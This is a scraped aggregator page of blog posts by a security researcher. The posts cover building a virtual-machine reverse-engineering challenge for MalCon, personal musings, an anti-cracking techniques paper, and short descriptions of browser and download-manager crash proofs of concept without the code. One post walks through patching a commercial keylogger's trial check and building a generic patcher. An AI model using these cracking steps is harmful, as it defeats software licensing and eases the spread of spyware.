http://www.secuobs.com Observatoire de la securite Internet fr webmaster@secuobs.com 2012-12-17 11:22:22 - Aodrulez : The Pied Piper from Aodrulez You can download the entire ppt, along with a detailed explanation as well as the accompanying videos here Download http://www.secuobs.com/revue/news/417329.shtmlhttp://www.secuobs.com/revue/news/417329.shtml Secuobs.com : 2012-12-17 11:22:22 - Aodrulez - My solution to malwarelu HackGyver's challenges from Aodrulez http://www.secuobs.com/revue/news/417328.shtmlhttp://www.secuobs.com/revue/news/417328.shtml Secuobs.com : 2011-12-07 20:43:06 - Aodrulez - Well, it was declared last year itself after the first malcon that we'll be having our own version of an online challenge for the world to compete overWe called it the CTM Which stood for 'Capture the Mal' challenge Nothing much happened after that though We all got busy with the rest of our work until about 3 months before the event, when we realized that we promised a CTM had completely forgotten about it As usual, when it comes to technical stuff MalCon, am the SPOC So, I was left with a mammoth taskIts not that I've never designed a CTF contest before infact I do that for all my workshops training sessions But this one was different We do malcon every year not because it earns us something or because we get perks for doing itInfact, we make no money out of it at all We do it because it was our dream We've learnt about 90pourcents of what we know by reading 'tuts' n textfiles on the internet, created by generous highly talented people We wanted to do our bit too Malcon is not about spreading malwares Its about generating proactive research by good people to build secure systems Well, so here I was, with no idea at all about how am gonna design this CTM thingyAnd then it happened I have this weird 'moment' once in a while where I get bombarded with loads of crazy ideas Thats how the idea of creating a Virtual-Machine based challenge came to my mind But there were 2 major problems 1 I had no experience in creating a VM manually 2 I wanted it to be simple enough so that even a common man can attempt it At first, I had to create a VM myself to prove that its possible I know that there are thousands of articles on that available but this one had to be simple The idea was to create a VM architecture that was as simple as possible so that the ones attempting it do not end up getting demoralized While, the VM-Code or the 'Bootrom' as I call it, can be complex enough to deliver the quality standards that we at malcon are fanatic about The good part was, I have considerable understanding experience with programming as well as reverse-engineering I've got past experience with creating some really complex effective anti-reversing routines too So, I figured out that this one wont be as tough as I thought it would be, initially How wrong was I D To begin with, I named my Abstract Processor as 'Aod8' Then, I tried to design it similar to the intel-processors am comfortable with Although, I figured out that I dont need more than 15 Instructions in my instruction-set to create a complex CTM, I thought that maybe someone, someday might wanna write some cool program for it thats the only reason why I endedup having about 40 instructions in all Once the design part of it was over I was almost sure that I had the required instructions in there, it was time to code the processorMy first choice was 'PERL' Its easy to program in, robust with REGEX more importantly I didnot have to mess with variable typesAh, I think I forgot to mention that in order to keep the CTM easy to attempt, I designed the processor to work with 'Byte' sized instructions data Most people are not comfortable with handling data at 'bit' levelSo, that was the reason behind this super simplistic Aod8 Architecture design Well, the PERL idea was disastrous Initially I struggled a little with type conversion Then againI never write the entire code at one stretch, ever P I write somethen test it thoroughly then go further When am trying a new idea or a theory, I am totally impatient to see if it works or not So obviously, the first instructions I implemented in my Aod8 processor were the ones that'll allow me to print a character on the screen so that if it works as expected, I can jump up down celebrate victory But but but the way I've designed it, I can only print one character at a timeThat too, if I send the 'output' opcode, it'll fetch the byte at the current location of the stack-pointer on the stack print itNow, lets say I want to print 'A' on the screen For that, I'll have to first push its ascii code onto the stack D As you can see, I cannot directly push data onto the stack eitherFor that, I'll have to move the ascii code to a GPR like 'A' or 'B', then push it onto the stack, then call the 'output' instruction In essence, the set of instructions to print a char 'A' on the screen in Aod8 Assembly would be mov a,65 mov sp ,a output halt Well, I've already uploaded all the Tools, source-codes everything related to my Aod8 project on GitHub you can find them here https githubcom Aodrulez Aod8 Below is the output on my terminal when I compile this code using my Aod8 Assembler written in PERL just to give you an idea of how the entire thing works So yea, that works perfectly when the bootrom is executed by the Aod8 Emulator Virtual Machine or Abstract Processor implementationwhich ever way you like to call it, it does print 'A' on the screen m But let me remind you that at that time I never had an assembler So, to see that output, I had to manually construct a bootrom using a Hex-Editor by inserting opcodes data in hex The moment I saw it print 'A' on the screen, I was in trance D That was it It proved my theory of a crazy CTM to be practically possible from that point onwards it was a mad rush to complete the processor implementation as soon as possible Well, I wrote it entirely in PERL first But after constructing bootrom manually, I wasnt getting expected results Thats when I found out that I made some major 'Type Conversion' errors here there This was awefully painful Either I could spend another day fixing the perl implementation which was starting to get me frustrated or I can switch to c c wind it up asap I opted for the second option for two reasons 1 I know c c very well 2 It'll prove my theory that the ctm can be played by anyone who can implement the Processor, in any language he likes So that was itI got the processor written top-to-bottom in less than 2hrs Now, I knew that I've implemented the Design perfectly, it was time to test each every instruction Initially I enjoyed the geek-feeling it gave to construct bootroms out of hex-editors manually but pretty soon I was having severe head-aches D Thats when I decided its time to write an 'Assembler' for this Architecture In the mean time, I had my PERL implementation too sorted out by comparing the output of my 'c' implementation I didnot even realize when this became an obsession I was working on my office related work all day working on this CTM all nite In a few day's time, I had a very crude Assembler than can convert asm code to bootroms, 2 implementations of the Aod8 processor a slightly tweaked version of the 'c' implementation acting like a debugger tracer It was time to learn the basics of programming something that I created D Yea, it sure sounds easy but it was notJust when I started to try serious programming, I realised that in my obsession with keeping the design simple, I had seriously limited the programming possibilities of the architecture The design was so simplistic that I couldnot even implement self-modifying code Because, the ROM was as the name suggests, Read-Only The Aod8 processor was designed to fetch instructions execute them the stack was provided solely to store temporary dataIt was impossible to modify the code during execution This meant that everything that was part of the CTM challenge had to be put up in a clearly-visible form inside the bootromAnyone with a code tracer would end up dumping all the important data off the bootrom Another limitation was the 'byte' implementation The only Flow-control instructions that were used in the CTM were cmp,je,jne,jle,jmp loop As you can see, every other jmp instruction requires a parameterThis parameter specifies the location to jump execute from now on The catch here though is that, the Aod8 Architecture can only have data upto the size of a 'byte'The biggest number in a single byte is 255 which meant that theoretically I would have been limited to a bootrom of size 255 bytes as I couldnot access a higher number because of the limitation in the design Thats when I decided to tweak the design a little bit partially bypass the limitation yet keeping the design simple You'll understand what I did if you observe the way I've implemented the 'jmp loop' instructions So far, so goodNow that I had some crude tools thorough understanding of the programming details, it was time to begin creating the CTM Somewhere near that time a huge tragedy struck Steve Jobs passed away we were all in shock That was when I decided that am going to do my bit for him Thats the reason you'll see a brief text right in the beginning of the CTM challenge when you boot it It was my way of thanking him for all that he has done Well, at first, I wanted to have challenges appearing back to back as the Aod8 Architecture was seriously limited but once I had the first level done, it looked so very boring It was time to push it up a few notches be artistic That was when I realised that my Assembler was seriously crude D Spent another day adding support for 'Labels' in my Assembler so that I can write code like jmp label_beginning instead of jmp 134 That was one helluva experience in itselfAt the end of the day, I had a sophisticated Assembler which made it much much easier to code things I needed to start designing the CTM again from scratch phew But now am so glad that I did This time around wanted to create a Linux-like feeling to it Getting the initial UI until you hit 'run' took about 2 days to code It was amazing yet I felt something was just not right I thought that if I put-up an Easter-Egg in the section where the general UI resides, chances are people wont find it out that easily Thats when I thought, why not create a 'Brainfuck Interpreter' for this architecture D It'll be piece of ART And guess what it took more time than creating the rest of the CTM itself If you want to see the first Easter-Egg, boot the CTM challenge when it says Press ENTER to boot AoDOS-Trial from this Bootrom , type ' ' hit enter aodrulez pwn4g3 malcon ctm processor -------------------------- Aod8 Virtual Processor -------------------------- c Aodrulez Reading the Boot-Rom Read successfully Total Size 136300 Registers initialised to 0 Booting using the Boot-Rom ------------------------------- ----------------------------------------------------- Here's to the crazy ones The misfits The rebels The troublemakers The round pegs in the square holes The ones who see things differentlyThey're not fond of rules And they have no respect for the status quo You can quote them, disagree with them, glorify or vilify them About the only thing you can't do is ignore them Because they change things They push the human race forward And while some may see them as the crazy ones, we see genius Because the people who are crazy enough to think they can change the world, are the ones who do Think Different ----------------------------------------------------- A tribute to the iConic Steve Jobs from the entire MalCon Team No more open Windows for malwares Press ENTER to boot AoDOS-Trial from this Bootrom Welcome to the Magic Dungeon --------------------------------------------- Aodrulez's Brainfuck Interpreter for AoDOS --------------------------------------------- Note The code should end with ' ' character Note The code should not contain Line-Feeds Enter Brainfuck code , - z zyxwvutsrqponmlkjihgfedcba ZYXWVUTSRQPONMLKJIHGFEDCBA Well, its a full-fledged Brainfuck interpreter written entirely in Aod8 Assembler You can try most of the brainfuck programs in it This was when my boss asked me to report the progress I made with the CTM D It took me some time to explain what I've done although he understood the beauty of it, he was worried that maybe not many will be able to solve it Thats when we decided that we keep it as simple as possible so that most of the people who attempt it, can crack it I was already done with 3 levels by this time I had some major plans for level-4 level-5 when we had this discussion thats when I decided to completely drop the idea of Level-5 I also re-wrote level-3 to have a very simple algorithm that can be easily reversed Level-4 is basically a crackme that I wrote in Brainfuck, being emulated on my Aod8 Brainfuck Interpreter Again, I re-wrote a simpler version of the Brainfuck crackme so that its do-able It was not designed for the Uber-Reversers at all It was for noobs for people who are majorly into programming Just by looking at the design I can think of funny ways to defeat all the levels The weakest point of the design being the Stack An emulator that dumps stack contents would have ended the game right away And frankly, we wanted winners Its amazing that I spent 1 whole month re-writing the CTM to make it simpler We had officially 2 winners this time Aseem Dhanesh They did a wonderful job But trust me, I've received more mails with compliments evident eagerness from people who were just attempting it For most, the part when they got the Emulator done when the bootrom displayed the initial message was an achievement in itself And for each mail that I received, I won once Now, let me give a brief idea of what the CTM contained It was about 130kb in size I managed to squeeze in 4 levels, 2 Easter-Eggs, Entire asm code of the CTM except Level-4, Aod8 Processor implementation in C as well as PERL, a real-virus code, complete 3-pass Assembler for Aod8 a sample asm file to explain the usage Now, thats pure Art But, it took me close to 2 months yea, I have a very hectic day-job where I work on ten thousand things at a time P to complete it, out of which I spent one whole month re-designing it to be simple I wrote the CTM almost 3 times from scratch Tested it on windows, linux even on my iPod to be sure that it works The Brainfuck Interpreter was a test of my patience persistence D I wrote that right from scratch almost 34 times until I got it right Infact, I wrote the Aod8 Asm code for it on paper manually about 4 times I designed each level separately finally when it was time to combine all of them into one single bootrom, it just wont work Spent another whole week going through about 1,29,918 lines of code debugging every single jump loop instruction until I got it fixed I guess its not patience after all, am just plain adamant Overall, for me it was a huge learning curve More than that, it has been a personal milestone in many ways I've always wanted to give back to the community this one gave me a platform to reach a wide range of people I hope that everyone who attempted the MalCon CTM this year had a good time Special Thanks to Shantanu Gawade for being my Beta-Tester Nirvana-Achieved http://www.secuobs.com/revue/news/345929.shtmlhttp://www.secuobs.com/revue/news/345929.shtml Secuobs.com : 2009-03-17 08:04:25 - Aodrulez - I am SingleI love my LifeLove my Lifen yepplemme say thatagain I love my LifeThere was a time when i felt likea lil female attention won't be badbutheck Nowto be frank I reallyDon't care about gettin any attentionAmidst this beautiful feelin came SheGod knows from wherebut yeahshe seemed to be too friendly to complainEveryone loves to get pampered once in awhilen so was IThis part of my life iswats called as "The Abundance Paradox"When u really need sumthinit seemslike thats the toughest thing on this planetto haven when u have sumthin in Abundance,or are really not interested in gettin "It""It" seems to be flowin into ur life inAbundance"The Abundance Paradox" as I putitNow the problem here was that "It" was abeautiful "She"Out of nowhere she landed inmy life a simple gmail chat led to PhoneNo Espionage n then yepp then onefine Monday evening she CalledShes' too fast I thoughtor maybe dat wasbecause I was out-of-the-scene fer a whileAnywaysno complains no feelinsdecided toGo-wid-Da-FlowTurned out we were in the adjacentrooms all our livesright from skooltocoaching classesto Church n we never saw eachotherAmazing diskovery but still notInterested nahSms'es became usual stuph actuallyI hate tapping out sms'es on ma phone but heyanything fer youlolConstant touch was maintaineduntil one day we decided to meetShe turned out tobe a Beautiful Girli was'nt actually expectingthatwink Had a Cuppa-Coffeen then I droppedher home beautiful nite Must admitshe cameShe sawShe conquered Butbut but Am notHead-over-Heels dear just a crush mayben i Knowthat its just that"A Crush" Today am feelindifferentpossibly even she's feelin differentn all that I have to say or rather Predict iswith my Jarhead Attitude fer me rightly son Not-So-Suicidal-Nature the question of us fallinis Love isa "Syntax Error" n lemme tell youeven though I Almost-love her"She Ain't Gonna Last Nope"IMAGEhttp://www.secuobs.com/revue/news/71661.shtmlhttp://www.secuobs.com/revue/news/71661.shtml Secuobs.com : 2009-02-04 21:54:28 - Aodrulez - Sounds like a Hollywood Movie Script of the late 1980'sI endup doingall sorts of Blundersin my lifeall through my childhood n teenage dayswhen i lookback nowall I see is a MrNobody, you knowthe kind of life whereu exist in silenceDead-Silence in my case, was trying to be the goodguy all lifeliving in some kind of a wonderland, lacking contactwith the real worlddrifting away from the worldly ways ofLifeScrewed up the few relationships that I've ever had, bigtimeand thats when i realisedmy life sucks I felt like acreature in a cocoonI desperately wanted to break freen "Live My Life, My Way"I knew that this was an Alien world to be inwith lots ofun-tresspassed pathsn I wanted to get lost somewhereand thisseemed to be the perfect TimeI really needed to forget mypastforget my mistakes forget my ex's forget my back-stabbingfriendsforget the very truth that I was alive till yet or that Imerely existedI wanted to start anewI tried to be occupied all the timein something or theothertryin to learn new thingsnew skillsn what can i sayI'vecome a long wayFeels better nowas a human Beingas a Sonas a Friendas aBrotherbut still I have a long long way to goand I aintgivin-upcuz I aint a quitter anymorehttp://www.secuobs.com/revue/news/58462.shtmlhttp://www.secuobs.com/revue/news/58462.shtml Secuobs.com : 2009-02-04 21:54:28 - Aodrulez - 1Keep updating the Rules to suit situations and my mood2Never under-estimate anyonenot even a fly3Never change yourself to attract or impress anyone4Opinions are just that"OPINIONS"in the enddo what youfeel is right5Being Single is not sumthin to be ashamed of6Self-Respect is more important than anything elsenever lose it7Be the Best in atleast one thing in Life8Give RespectTake Respect9Never get into Fightscuz it ruins your Imagebut ifthe Bad Guy insistsBreak his Jaw10Live My Life"My Way"http://www.secuobs.com/revue/news/58461.shtmlhttp://www.secuobs.com/revue/news/58461.shtml Secuobs.com : 2009-02-04 21:54:28 - Aodrulez - Millions of people livin on this planet we call earth yethow manydo weknow by the namewe r like frogs in a well but the questionishow big isthis wellwe earthlings r in a sort of well tooattached toearthbound bythe laws of physicscuz we know they r truethey are practicallawstheydo Workand unfortunatelywe havent yet found a frame in whichthey failSowe Believe and dont dare to question them anymoresad I feellikeam tied cuz of the thoughts of some Great people but what arehuman thoughtsanyway who really cares about them apart from us earthlings whydo weseem to like the idea of being important in this Big-Bangsoupwhy do weeven think maybe cuz that is sumthin we were made to doby yearsof evolutionwe think n so we areWe often hear children wishin they could have wings et flyhow oftendowe hear the grown-ups say the same dats cuz we know we cant doiton earthdue to the laws of natureheck y cant we even dream withoutbeing constrainedby these laws I wanna have a better view of myselffrom someanother framewere nobody is bound by any stringswhere we dont feel like puppetswho go back tothe same box from where they came I wanna Break-Freelike getout of my ownskinand flyat a speed which is a multiple of the speed oflighti wanna see my lifein slow motioni wanna Rewind to the past n make a lot ofrectificationsi wannaFast-forward to futureand see whats in store fer mei wanna beable to livemy life my way I wanna Feel Like GOD I dohttp://www.secuobs.com/revue/news/58460.shtmlhttp://www.secuobs.com/revue/news/58460.shtml Secuobs.com : 2009-02-04 21:54:28 - Aodrulez - Did sumthin i never believed i could even in my wildest Dreams Mask-mani was talkin in disguisethat strongly reminds me of a movie"V" for Vendetta YupI felt wat it felt to be "V"But there was a difference"V" fought to change the Governments'Attitudeto do people good I was just being selfish I guessDunnohow many more times will i wear the same Maskcuz its atemptationwish i won't ever do that againFelt her in a good moodfer the first time in 4-5 yearsTalked like we never kneweach-other Didnt have to explain my past mistakes felt like idid the biggest mistake of my lifescrewing-up our relationship 4yrs backBut Great Men say"He who never made a mistake, never made adiscovery" I didn i made a discovery or twothe problem is thecontradicting nature of the discoveriesDunno which one tofollowHelplessnopeHopelesshahayeahthats thetruththe relationship is a hopeless one nown i ain't doing thesame mistakes againTold hernot to look out fer my identitynotworth itcuz grass alwayz looks greener on the other sidedon'twalk across n spoil the view Sofer now"V" in me is goinfer hibernationuntilshe wakes him up"V" did what Aodrulez could'nt do n Thanks a ton fer thathttp://www.secuobs.com/revue/news/58459.shtmlhttp://www.secuobs.com/revue/news/58459.shtml Secuobs.com : 2009-02-04 21:54:28 - Aodrulez - Detailed Analysis of a recent Commercial Keylogger App are as follows:1 Uses a Driver *sys for all its keylogging activity2 Driver is setup as a Service3 Setupexe of the keylogger generates random names for its corecomponents which areinstalled4 Setup as well as the installed components verify if the applicationhas been registeredby accepting a “key” and using a very tedious Key validation routine5 The only limitation of the trial version are some nags and limitedTime-period forthe usage of the app after which u need to register it, to use itThe actual protection scheme used:1 Setupexe actually generates a random name for the temporary filecreated2 Then it extracts a DLL, which contains the actual installationroutine3 The main function of this DLL is to:a Generate a random nameb Use this random name as the prefix of the components which are tobeinstalledc Then install the Driver which is also assigned the random name as aServiceon the host system4 But the important thing to note is that the driver which isinstalled has no“function” to check if the application’s trial period is over or not5 If you have not registered the app, you have a trial period of 15Days in whichthe application is fully functional except for the nags that show-upNow, onto the ways to crack this protection scheme:1 One way of doing it could be to find out the registration routineand reverse it2 Another way is to patch itWell, the serial Validation routine looked really tedious so I decidedto “Patch my way to Glory”Points to remember while attempting this technique:1 Either patch the setupexe to always spit out files with the samenames sothat we could make a “Patch” for the app after we successfully crackit2 Or else crack the components which have been installed on thesystemNow the problem with the first Point is that the actual routine whichgenerates randomnames and installs components is in the DLL that is itself extractedfrom the SetupexeSo, it won’t be a great idea to try to patch the Setup and make itspit a patched version ofthe DLL that works according to our wishesSo I quickly moved onto cracking the components that were installed onmy systemWell…the best thing about this Keylogger as far as cracking it isconcerned is, it showsall its core components’s names if you select a Menu Option So a hugetask of hunting down those files is reduced Now, as previouslymentioned, the only limitations of theUnregistered version are Nags and 15 Days of trial periodWell, a little snooping around helped me to pin-point the componentwhich was responsible for determining if the trial period was over ornot and also to generate the nags if it was still unregisteredNote: One weakness of this scheme is that only this component wasresponsible to determine if the application was registered or not andto show the Nags Even others could have been assigned the same taskNot only that, the application and all its components are written inC++ and the programmers didn’t even bother to pack or protect themMaybe it has to do something with the fact that during eachinstallation the components probably even had different CRC … can’tsay for sure thoughWell…the executable probably uses Global Variables to determine itsRegisteredStatus But still, modifying them wasn’t needed either Here is thedisassembly of the section which determines if the application isRegistered or not:004016E6 8D45 E4 LEA EAX,LOCAL7004016E9 50 PUSH EAX ; /Arg2 = 00000000004016EA 8B4D F4 MOV ECX,LOCAL3 ; kernel327C8399F3004016ED 51 PUSH ECX ; Arg1 = 0012FFB0004016EE E8 CD110000 CALL savezl_e004028C0 ; ß-Actual routine004016F3 83C4 08 ADD ESP,8004016F6 8945 E0 MOV LOCAL8,EAX ; EAX==Result 004016F9 837D E0 00 CMP LOCAL8,0004016FD 0F84 80000000 JE savezl_e0040178300401703 837D E4 00 CMP LOCAL7,000401707 74 7A JE SHORT savezl_e0040178300401709 837D E8 00 CMP LOCAL6,00040170D 75 06 JNZ SHORT savezl_e004017150040170F 837D EC 00 CMP LOCAL5,000401713 7E 6E JLE SHORT savezl_e0040178300401715 837D E8 00 CMP LOCAL6,000401719 74 21 JE SHORT savezl_e0040173C0040171B 8D55 E4 LEA EDX,LOCAL70040171E 52 PUSH EDX ; /lParam = ntdllKiFastSystemCallRet0040171F 68 ED174000 PUSH savezl_e004017ED ; DlgProc =savezl_e004017ED00401724 6A 00 PUSH 0 ; hOwner = NULL00401726 6A 6A PUSH 6A ; pTemplate = 6A00401728 6A 00 PUSH 0 ; /pModule = NULL0040172A FF15 ECB04100 CALL NEAR DWORD PTR DS:;GetModuleHandleA00401730 50 PUSH EAX ; hInst = NULL00401731 FF15 F4B14100 CALL NEAR DWORD PTR DS:;DialogBoxParamA00401737 8945 FC MOV LOCAL1,EAX0040173A EB 1F JMP SHORT savezl_e0040175B0040173C 8D45 E4 LEA EAX,LOCAL70040173F 50 PUSH EAX ; /lParam = NULL00401740 68 121A4000 PUSH savezl_e00401A12 ; DlgProc =savezl_e00401A1200401745 6A 00 PUSH 0 ; hOwner = NULL00401747 6A 65 PUSH 65 ; pTemplate = 6500401749 6A 00 PUSH 0 ; /pModule = NULL0040174B FF15 ECB04100 CALL NEAR DWORD PTR DS:;GetModuleHandleA00401751 50 PUSH EAX ; hInst = NULL00401752 FF15 F4B14100 CALL NEAR DWORD PTR DS:;DialogBoxParamA00401758 8945 FC MOV LOCAL1,EAX0040175B 837D FC FF CMP LOCAL1,-1As you can clearly see…the code which is highlighted in Red, is thepart that checks if the application is registered or not Just modifythe JE savezl_e00401783 toJmp savezl_e00401783 and you’ll see that the application runs Merrilyfor as long as you want and even all the Nags are eliminatedJust asmall patch to kill such a beautiful registration routine Okay, nowthe general method to crack it would be to install the Keylogger onyour system Now a normal Patch wont work in this case because wecannot predict the Random name generated by the SETUP So, we’ll makea generic patcher that’ll patch the code JE savezl_e00401783 to Jmpsavezl_e00401783 and wont check the CRC of the executable because itwas observed to fail when it checks for that Oh yes, the componentwhich needs to be patched is very easy to identify too…just go to your“RootwindowsSystem32” folder and search for “*lexe” that is, allexecutable files with the last character as “l” and this particularexecutable has a Transparent Icon You’ll also find that its runningin your computer’s memory because its loaded during startup, so simplyuse the EndTask option of Task Manager, patch the executable andrestart your computer You’ll see that all nags are gone and also thetime limit is gone You can try changing the system time and still theKeylogger works perfectly finec Aodrulezhttp://www.secuobs.com/revue/news/58458.shtmlhttp://www.secuobs.com/revue/news/58458.shtml Secuobs.com : 2009-02-04 21:54:28 - Aodrulez - Author:AodrulezEmail: f3arm3d3ar@gmailcomWellwe all know there are thousands of such textfiles floating onthe InternetAm not adding sumthin to the already present chaosThispaper focuses primarilyon approaches that you might find novel oruseful in implementing "Anti-Cracking Protection" in your appsTechniques:1A Registration-Routine Technique:Simply bored of seeing the same tricks being used etabused, I thoughtof trying a novel approachWhat if we triedthis:Usual Registration Routines:1Accept Username/Serial from user/file 2Use some math-operators eteither a Calculate the serial directly from Username et thencompare with user-input serialDumb b Calculate a Hash from theusername as well as serial using different algo ofcourse et thencompare them 3Either carry on with the registered status 4orDisplaya message saying"Not Registered"My way:1 Accept the username/serial from user/file 2 Use some algo on boththe Username et serial and based on that, generate "opcodes" 3 Injectthese opcodes into the registration routine 4 If the "opcodes"generated match, then et only then will the app get registeredelse itwill crash 5 Use SEH so that in case of a crash, the app can beterminated elegantlySo Algorithm-Wise this looks like this:-----------------------------------------------------------------@app_startup: 1Implement SEH@registration_routine: 1Accept username/password from the user/file2Use some algo that generates "opcodes" from the user input data3Inject these opcodes into the successful_registration routine@successful_registration: most of the instrucions here are likethis: push 0 push offset good-boy-text push offset good-boy-captionpush 0 lea eax,MessageBoxA db 090h }-------this should be "FF" to makethe MessageBoxA db 0d0h } function work "call eax" instruction-- FFD0"byte-sequence" Depending upon the user input et the algo used, the0x90 byte should be changedto/injected-with 0xFF for the app to getregistered Else, if the user/input is not correct, the furtherroutine will look malformed et the app will crash@SEH_routine: 1 Just when the app crashes, the SEH will be called etyou can make a graceful exit or maybe handle it et resume execution :----------------------------------------------------------------------Benefits of this approach:1 You can simply make the wholeRegistration routine look Bogus et generate it on the fly fromuser-input2 Unless the user enters the right Serial/sequence, theregistration routine will always look bogusSo not much can be madefrom Disassembly of the routine3 The only way to crack this kind ofa protection would be to know the "opcodes" fairly well et know howcode execution takes place~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~2Anti-patchingWell, most almost all of the debuggers of today rely on "0xcc" orrather "int3" for setting up normal breakpointsHow this thing worksis like this:The moment you place a BreakPoint sumwhere, that particular OpCodegets replaced by a "0xcc" byteNow lets simplify this method'sideaIts likethe actual opcode is replaced by 0xcc, then thedebugger monitors the app's execution to spot int3 being executed ifits hit, then the debugger halts execution at that point et replacesthe 0xcc byte with the actual Previous Byte opcode How to defeatit One way would be to implement a CRC checkOr you might go on thesame idea,develop a smallalgo that simply calculates a magic value bygoing throughyour code during runtime et checks it with the actualvalueit should have if your app is intactThis approach of writingyourown algorithm is recommended because the standard CRClibrary functionsif implemented in your app, can be easilydetected by the current toolsavailable Second way Yep another good way would be to write theimportantparts of your apps' code dynamically to the requiredlocations likeused in many ViriiExamplehere we go:A simple app with Username/Serial type registration routine:-----------------------------------------------------------------app_startup: Immediately when your app starts, 1Do a simple crc-typecheck on the registration routine 2If intact, copy the actualregistration routine byte-wise-encrypted into the encrypted_codesection of the apps' memory 3Simultaneously Nullify or 'NOP' theactual registration routineregistration_routine: 1Decrypte code from encrypted_code into theactual_code section of your app 2Call this newly written routine forthe validation of registration detailsactual_code: 1Actual registration routine goes hereencrypted_code: 1Its more like a buffer to store the encryptedregistration routine------------------------------------------------------------------Benefits of using this technique:1 The actual registraion routine isalways re-written before being executedThis kills the 0xcc byteplaced by the debugger to cause a break in executionbreakpoint2You can always use a CRC-type of check to verify the integrity of yourregistration-routine, so if patched by "newbie-crackers",you couldtackle this by maybe over-writing from a bakup-copy of yourregistration routine from the app's memory or a Dll~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~3Applying Modified Shell-Code TrickShellCodes are nothing but executable machine code to whichif EIPpoints towill do something worthwhile :-like maybe spawn aWindows CalcShellcodes are many a times crafted for a particularversion of an OSbecause of the Library function callsthat have to bemadeBut with much less pain, similar technique can be used to causesome more Code-Reversing troubleOkies thatwas a patheticintroduction to Shellcodesbut its another huge topicin itselfetthis paper only mentions certain aspects of it whichwe can use asAnti-Cracking techniquesSo what can we use from themLets see another algo:-----------------------------------------------------------------@startup: 1Find the exact version of the OS currently your app isrunning onLets assume your registration routine uses MessageBoxAfunction in itso in that case,recover the address of that functionfrom a table already present in your appwhich looks sumwhat likethis: Windows 2000 : MessageBoxA ==0x7AAAAAA; Windows Xp Sp1:MessageBoxA ==0x7BBBBBB; Windows Xp Sp2: MessageBoxA ==0x7CCCCCC;Or elsedo sumthin like this: lea eax,MessageBoxA movapi_Addr,eax ---- "api_Addr" is a variable to hold its addressThiseliminates the need for maintaining a table2 Call @Registration_routinepart 1@Registration_routinepart 1: 1Actual registration routine lies inthe "@encrypted_registration_routinepart 2" section of your apps'memory 2So first you decrypt it right there 3Now the Win32 APIfunction calls will look obsoletebecause the addresses differ4Inject the API's Correct memory address from the api_Addr variableso that its fixed 5Call @encrypted_registration_routinepart 2routine@encrypted_registration_routinepart 2: 1This section containsalready encrypted machine code 2For examplethe actualun-encrypted code could look sumthing like this: push 0 push offsetText push offset Caption push MB_OK call 0xAAAAAAAA <---- This is theaddress we have to fix when called from the previous function afterdecryption---------------------------------------------------------------------Benefitsof this technique:1 You don't need to have the actual codethenencrypt itet then decrypt itas in the 2nd technique described inthis Paper2 If disassembled this code will look fairly weird3 Evenhere, the Breakpoints can be killed as described previouslyOfcourse these techniques are not Fool-Proof but if implementedcorrectly et efficiently can prevent your appfrom being cracked by the"Newbie et maybe even Intermediate"type of a software crackerOne veryimportant thing you must know is:"Every Piece of code ever written tothis day, can be either Reversed or Patched"You can only try to make it harder or simply Boring to do so :PHopethis Paper was useful :A very Simple PoC of these techniques might be obtained from here:http://wwwcrackmesde/users/aodrulez/aodrulez_crackme_v10/---------------------------------------------------------------------Greetz fly out to:1Amforked :My Mentor2LiquidWorm et Jeremy Brown:For being so nice to a noob like me3wwwOrchidSevencom :For givinme this beautiful opportunityhttp://www.secuobs.com/revue/news/58457.shtmlhttp://www.secuobs.com/revue/news/58457.shtml Secuobs.com : 2009-02-04 21:54:28 - Aodrulez - Tested on Version : 031549By :AodrulezGoogle Chrome completely crashes due to "Access Violation" exceptionif the userright-clicks any file in the "Open File" dialog thatpops-up, twice within same tab or other tabsIf you select anyfileonce, right-click it, et select any optionthen either click "Open"or "Cancel"et try todo the same again, Memory corruption occurscausing all the tabs et the entire Browser to CrashHow to test this PoC:1 Click the first "Choose File", selectany folder or file, right-click n select "properties"Then cancel the"Open" dialog box2 Click the second "Choose File", select any folderor file,et simply right-click to see Google Chrome Crash due to "AccessViolation"------------------------------------------------------------------Greetz fly out to:1LiquidWorm : For being so nicen guiding me:-2str0ke : For goin thru all my silly e-mails3Amforked : MyMentor------------------------------------------------------------------By:Aodrulez, wwwOrchidSevencom, aodrulezblogspotcomEmail: f3arm3d3ar@gmailcomPoC :------------------------------------------------------------------http://www.secuobs.com/revue/news/58456.shtmlhttp://www.secuobs.com/revue/news/58456.shtml Secuobs.com : 2009-02-04 21:54:28 - Aodrulez - Developer: wwwIndentixcomTested On: Windows Xp Pro Sp2 et GoogleChrome browser 0214930By: AodrulezThis download manager crashes completely when the attachedspeciallycrafted files' contents are copied to System clipboardSo, if youcraft a special HTML file as shown below, the link thatit generatescompletely kills Winget 30 remotelyUsage:Start Winget, minimize its window et then open the htmlfile in abrowserfully tested on Google chrome et then followonscreenintructionsThis html file downloads a specially craftedtext file etrenders its contents as a linkGreetz fly out to:1LiquidWorm : For being so nicen guiding me:2str0ke : For goin thru all my silly e-mails3Amforked : Mymentor4OSRT :- This is dedicated to all the members------------------------------------------------------------------By:Aodrulez, wwwOrchidSevencom, aodrulezblogspotcomEmail: f3arm3d3ar@gmailcomThe Exploit:-----------------------------------------------------------------------------Aodrulez's Winget 30 Download ManagerBuild 112 Remote DOS ExploitPoCGreetz Fly Out to: LiquidWorm,str0ke et Amforkedhttp://www.secuobs.com/revue/news/58455.shtmlhttp://www.secuobs.com/revue/news/58455.shtml Secuobs.com : 2009-02-04 21:54:28 - Aodrulez - By: AodrulezGoogle Chrome Version:0214930Tested on: Windows Xp Pro Sp2Google Chrome's tab starts to act totally weird etfreezes when you tryto open an html file as shown belowHere, the actual problem istriggered by an Input box to which a large String is fedTry feedinga still largerstring et the tab will be totally uselessTested etworking almostsimilarly on Opera 951,Win32 Platform Try removingthis line:"documentform1the_boxvalue = x;"And all the above stated browsers run finePoC:-----------------------------------------------------------------------------------------------Aodrulez's Google Chrome Text-Input based Tab freezing Exploithttp://www.secuobs.com/revue/news/58454.shtmlhttp://www.secuobs.com/revue/news/58454.shtml Secuobs.com : 2009-02-04 21:54:28 - Aodrulez - Developer: wwwIndentixcomTested On: Windows Xp Pro 